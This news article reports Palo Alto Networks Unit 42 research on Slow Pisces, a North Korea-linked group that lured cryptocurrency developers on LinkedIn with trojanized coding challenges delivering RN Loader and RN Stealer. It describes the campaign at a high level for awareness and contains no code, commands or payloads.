The North Korea-linked hacking group, Slow Pisces, has been targeting cryptocurrency developers with malware disguised as coding challenges. Researchers from Palo Alto Networks Unit 42 have attributed this new malicious campaign to the threat actor, which is also referred to as Jade Sleet, PUKCHONG, TraderTraitor, and UNC4899. Security researcher Prashil Pattni said, “Slow Pisces engaged with cryptocurrency developers on LinkedIn, posing as potential employers and sending malware disguised as coding challenges.
These challenges require developers to run a compromised project, infecting their systems using malware we have named RN Loader and RN Stealer.
The campaign follows a multi-stage attack chain. First, Slow Pisces sends targets a benign PDF document with a job description. If interested, the developers receive a skills questionnaire with instructions to download a trojanized Python project from GitHub.
While the project appears capable of viewing cryptocurrency prices, it is actually designed to contact a remote server and fetch an additional payload. Slow Pisces employs a targeted approach, sending the malicious payload only to validated targets based on specific criteria such as IP address, geolocation, and HTTP request headers. This method has allowed the campaign to persist without significant changes over time.
Cryptocurrency developers targeted on LinkedIn
Andy Piazza, Senior Director of Threat Intelligence at Palo Alto Networks Unit 42, noted, “Before the Bybit hack, there was very little detailed awareness and reporting of the campaign in open source. The campaign has continually updated its OPSEC on sites like GitHub, varying the lures used and how payloads can be executed.”
The malware, RN Loader, sends the command-and-control server basic information about the victim’s machine and operating system.
In return, it receives a Base64-encoded blob containing RN Stealer, an information stealer capable of harvesting sensitive data from Apple macOS systems. This includes system metadata, installed applications, iCloud Keychain, stored SSH keys, and configuration files for cloud services. Pattni explained, “Focusing on individuals contacted via LinkedIn, as opposed to broad phishing campaigns, allows the group to tightly control the later stages of the campaign and deliver payloads only to expected victims.” This approach helps conceal the execution of arbitrary code from the command-and-control servers.
The recurrence of developer-oriented campaigns, particularly targeting those with access to valuable cryptocurrency, underscores their effectiveness. Slow Pisces stands out for its operational security, deploying later-stage tooling only when necessary and ensuring payloads are heavily guarded and exist solely in memory. Palo Alto Networks Unit 42 emphasizes the importance of awareness and vigilance among developers, especially those working in high-value sectors like cryptocurrency.
The cybersecurity community continues to monitor and analyze these sophisticated campaigns to mitigate the associated risks.
Source: DevX.com / Digpu NewsTex
